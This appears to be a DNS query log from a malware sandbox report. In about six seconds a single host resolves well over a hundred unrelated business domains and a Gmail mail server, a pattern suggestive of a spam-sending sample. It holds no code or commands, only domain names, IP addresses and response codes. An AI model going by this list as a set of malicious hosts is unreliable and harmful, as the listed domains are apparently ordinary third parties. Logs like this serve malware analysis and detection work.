                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.382611036 CET8.8.8.8192.168.2.60xeeb3No error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.382611036 CET8.8.8.8192.168.2.60xeeb3No error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.382611036 CET8.8.8.8192.168.2.60xeeb3No error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.430902958 CET8.8.8.8192.168.2.60x8d20No error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.441241980 CET8.8.8.8192.168.2.60xa13eNo error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.465713978 CET8.8.8.8192.168.2.60x8e34No error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.465713978 CET8.8.8.8192.168.2.60x8e34No error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.465713978 CET8.8.8.8192.168.2.60x8e34No error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.465713978 CET8.8.8.8192.168.2.60x8e34No error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.490727901 CET8.8.8.8192.168.2.60x7394No error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.541479111 CET8.8.8.8192.168.2.60x155eNo error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.561851025 CET8.8.8.8192.168.2.60x27c8No error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.567833900 CET8.8.8.8192.168.2.60x8ea4No error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.568516016 CET8.8.8.8192.168.2.60xf9c3No error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.623243093 CET8.8.8.8192.168.2.60xb528No error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.640201092 CET8.8.8.8192.168.2.60x16e3Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.674741983 CET8.8.8.8192.168.2.60x3f31No error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.684791088 CET8.8.8.8192.168.2.60xbc54No error (0)sidepath.com34.193.69.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.684791088 CET8.8.8.8192.168.2.60xbc54No error (0)sidepath.com34.193.204.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.684791088 CET8.8.8.8192.168.2.60xbc54No error (0)sidepath.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.684791088 CET8.8.8.8192.168.2.60xbc54No error (0)sidepath.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.697546959 CET8.8.8.8192.168.2.60xd205No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.715449095 CET8.8.8.8192.168.2.60x68e2No error (0)ascc.org.au203.210.102.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.717386961 CET8.8.8.8192.168.2.60xffd4Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.807226896 CET8.8.8.8192.168.2.60x35e5No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.820643902 CET8.8.8.8192.168.2.60x1ed4Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.970063925 CET8.8.8.8192.168.2.60x4a66Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.019232035 CET8.8.8.8192.168.2.60x4ca9No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.031217098 CET8.8.8.8192.168.2.60x8621Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.038723946 CET8.8.8.8192.168.2.60x66ebNo error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.088594913 CET8.8.8.8192.168.2.60xeb30No error (0)rkengg.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.088594913 CET8.8.8.8192.168.2.60xeb30No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.088594913 CET8.8.8.8192.168.2.60xeb30No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.088594913 CET8.8.8.8192.168.2.60xeb30No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.284209013 CET8.8.8.8192.168.2.60xa2bfServer failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.531864882 CET8.8.8.8192.168.2.60x855fServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.581748962 CET8.8.8.8192.168.2.60xea2bNo error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.612344027 CET8.8.8.8192.168.2.60xd16cNo error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.653105974 CET8.8.8.8192.168.2.60x16e3Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.669472933 CET8.8.8.8192.168.2.60xa46aNo error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.681123018 CET8.8.8.8192.168.2.60xd795No error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.694370985 CET8.8.8.8192.168.2.60xe1dfNo error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.694370985 CET8.8.8.8192.168.2.60xe1dfNo error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.745214939 CET8.8.8.8192.168.2.60xffd4Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.779481888 CET8.8.8.8192.168.2.60x999bNo error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.779481888 CET8.8.8.8192.168.2.60x999bNo error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.779481888 CET8.8.8.8192.168.2.60x999bNo error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:22.982636929 CET8.8.8.8192.168.2.60xc655Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:23.012120962 CET8.8.8.8192.168.2.60x69c5No error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:23.012120962 CET8.8.8.8192.168.2.60x69c5No error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:23.116662979 CET8.8.8.8192.168.2.60xde2bName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:23.160042048 CET8.8.8.8192.168.2.60x687fNo error (0)cpmteam.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:23.160042048 CET8.8.8.8192.168.2.60x687fNo error (0)cpmteam.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:23.179404974 CET8.8.8.8192.168.2.60x2afNo error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:23.184439898 CET8.8.8.8192.168.2.60x8974No error (0)polprime.com154.214.189.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:23.507551908 CET8.8.8.8192.168.2.60x855fServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.049429893 CET8.8.8.8192.168.2.60xafb7Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.180016994 CET8.8.8.8192.168.2.60x2e7aNo error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.180016994 CET8.8.8.8192.168.2.60x2e7aNo error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.213371038 CET8.8.8.8192.168.2.60xe72dName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.248187065 CET8.8.8.8192.168.2.60x4580No error (0)gmail-smtp-in.l.google.com142.250.27.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.273607016 CET8.8.8.8192.168.2.60x3478No error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.278800964 CET8.8.8.8192.168.2.60x3b45No error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.279484987 CET8.8.8.8192.168.2.60xd25bName error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.307145119 CET8.8.8.8192.168.2.60x96cdNo error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.310210943 CET8.8.8.8192.168.2.60x2bc0No error (0)leapc.com35.231.13.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.320837021 CET8.8.8.8192.168.2.60x58b8No error (0)akdeniz.nl109.71.54.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.423857927 CET8.8.8.8192.168.2.60xfa4eName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.432892084 CET8.8.8.8192.168.2.60xcacfNo error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.454099894 CET8.8.8.8192.168.2.60x6e28No error (0)likangds.com23.225.40.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.547101021 CET8.8.8.8192.168.2.60x2150No error (0)likangds.com23.225.40.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.555994034 CET8.8.8.8192.168.2.60x855fServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.557612896 CET8.8.8.8192.168.2.60x17fcName error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.557768106 CET8.8.8.8192.168.2.60x83d7No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.557768106 CET8.8.8.8192.168.2.60x83d7No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.572220087 CET8.8.8.8192.168.2.60xb93dNo error (0)likangds.com23.225.40.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.574763060 CET8.8.8.8192.168.2.60xf31cNo error (0)dayvo.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.574763060 CET8.8.8.8192.168.2.60xf31cNo error (0)dayvo.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.575592995 CET8.8.8.8192.168.2.60x10cbName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.580055952 CET8.8.8.8192.168.2.60x780aNo error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.608295918 CET8.8.8.8192.168.2.60xd1d1No error (0)tbvlugus.nl174.129.25.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.612667084 CET8.8.8.8192.168.2.60x6122Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.614763021 CET8.8.8.8192.168.2.60x1c67No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.625073910 CET8.8.8.8192.168.2.60xeef8No error (0)bidroll.com13.56.33.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.646388054 CET8.8.8.8192.168.2.60x4242Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.665477037 CET8.8.8.8192.168.2.60x16e3Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.681463957 CET8.8.8.8192.168.2.60x7e9cNo error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.803077936 CET8.8.8.8192.168.2.60x405eNo error (0)kumaden.com49.212.180.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.850528955 CET8.8.8.8192.168.2.60x1ea6No error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.928152084 CET8.8.8.8192.168.2.60xdfa1No error (0)polprime.com154.214.189.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.933713913 CET8.8.8.8192.168.2.60xf96No error (0)shenhgts.net199.59.243.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:24.979207993 CET8.8.8.8192.168.2.60xe6dbNo error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.037955999 CET8.8.8.8192.168.2.60xafb7Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.056859016 CET8.8.8.8192.168.2.60x74aeNo error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.119617939 CET8.8.8.8192.168.2.60x8b5fNo error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.166291952 CET8.8.8.8192.168.2.60x2aeNo error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.297451973 CET8.8.8.8192.168.2.60xc30eNo error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.475838900 CET8.8.8.8192.168.2.60x208cName error (3)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.594063997 CET8.8.8.8192.168.2.60x199cNo error (0)unicus.jp49.212.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.601695061 CET8.8.8.8192.168.2.60xcf27Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.625407934 CET8.8.8.8192.168.2.60x792aNo error (0)ikulani.com157.7.107.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.680119991 CET8.8.8.8192.168.2.60xdecbNo error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.793016911 CET8.8.8.8192.168.2.60x4057No error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.806752920 CET8.8.8.8192.168.2.60x5dc1No error (0)oozkranj.com212.44.102.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.813465118 CET8.8.8.8192.168.2.60xed99No error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.825355053 CET8.8.8.8192.168.2.60xfe7No error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.851145983 CET8.8.8.8192.168.2.60xb948No error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.877589941 CET8.8.8.8192.168.2.60x341eNo error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.894151926 CET8.8.8.8192.168.2.60x37a0No error (0)cjcagent.com157.112.187.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.929096937 CET8.8.8.8192.168.2.60x461No error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.929096937 CET8.8.8.8192.168.2.60x461No error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.929096937 CET8.8.8.8192.168.2.60x461No error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.937278986 CET8.8.8.8192.168.2.60xe52fNo error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.954612970 CET8.8.8.8192.168.2.60x7406No error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.973908901 CET8.8.8.8192.168.2.60xc4eeNo error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.006217003 CET8.8.8.8192.168.2.60xfcb8No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.026856899 CET8.8.8.8192.168.2.60x5ea8No error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.093453884 CET8.8.8.8192.168.2.60xafb7Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.128726006 CET8.8.8.8192.168.2.60xc130Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.142431021 CET8.8.8.8192.168.2.60x23edServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.148582935 CET8.8.8.8192.168.2.60x3b8aName error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.148792028 CET8.8.8.8192.168.2.60x7ff0Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.173166990 CET8.8.8.8192.168.2.60xcabName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.194951057 CET8.8.8.8192.168.2.60x75d4No error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.194951057 CET8.8.8.8192.168.2.60x75d4No error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.194951057 CET8.8.8.8192.168.2.60x75d4No error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.295221090 CET8.8.8.8192.168.2.60x7b07No error (0)pcoyuncu.com213.142.131.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.429294109 CET8.8.8.8192.168.2.60x4ac5No error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.493678093 CET8.8.8.8192.168.2.60x5181No error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.526760101 CET8.8.8.8192.168.2.60xc035No error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.581844091 CET8.8.8.8192.168.2.60x1e13Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.626153946 CET8.8.8.8192.168.2.60x855fServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.640418053 CET8.8.8.8192.168.2.60x1d9aNo error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.651609898 CET8.8.8.8192.168.2.60x9365No error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.662956953 CET8.8.8.8192.168.2.60x7d54No error (0)eos-i.commacx1980.qy56.supcname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.662956953 CET8.8.8.8192.168.2.60x7d54No error (0)macx1980.qy56.supcname.commfddos.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.662956953 CET8.8.8.8192.168.2.60x7d54No error (0)mfddos.datacname.com15.204.18.132.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.662956953 CET8.8.8.8192.168.2.60x7d54No error (0)15.204.18.132.datacname.com15.204.18.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.913438082 CET8.8.8.8192.168.2.60x2734No error (0)kallman.net185.76.64.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.935708046 CET8.8.8.8192.168.2.60x6ff6No error (0)dayvo.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.935708046 CET8.8.8.8192.168.2.60x6ff6No error (0)dayvo.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.010088921 CET8.8.8.8192.168.2.60xe05aNo error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.014682055 CET8.8.8.8192.168.2.60x224dNo error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.048515081 CET8.8.8.8192.168.2.60xd793No error (0)tabbles.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.048515081 CET8.8.8.8192.168.2.60xd793No error (0)tabbles.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.093720913 CET8.8.8.8192.168.2.60xc87dNo error (0)sgk.home.pl89.161.136.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.105861902 CET8.8.8.8192.168.2.60x44b7No error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.156106949 CET8.8.8.8192.168.2.60x664eNo error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.169507027 CET8.8.8.8192.168.2.60x9c72No error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.223834038 CET8.8.8.8192.168.2.60x4b4bNo error (0)envogen.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.223834038 CET8.8.8.8192.168.2.60x4b4bNo error (0)envogen.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.272670984 CET8.8.8.8192.168.2.60x8604No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.526751995 CET8.8.8.8192.168.2.60xdda5Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.526787996 CET8.8.8.8192.168.2.60x8729No error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.526787996 CET8.8.8.8192.168.2.60x8729No error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.526787996 CET8.8.8.8192.168.2.60x8729No error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.526787996 CET8.8.8.8192.168.2.60x8729No error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.545732021 CET8.8.8.8192.168.2.60xce35No error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.545732021 CET8.8.8.8192.168.2.60xce35No error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.617867947 CET8.8.8.8192.168.2.60x1397No error (0)forbin.net104.21.41.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.617867947 CET8.8.8.8192.168.2.60x1397No error (0)forbin.net172.67.148.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.631083012 CET8.8.8.8192.168.2.60xab11No error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
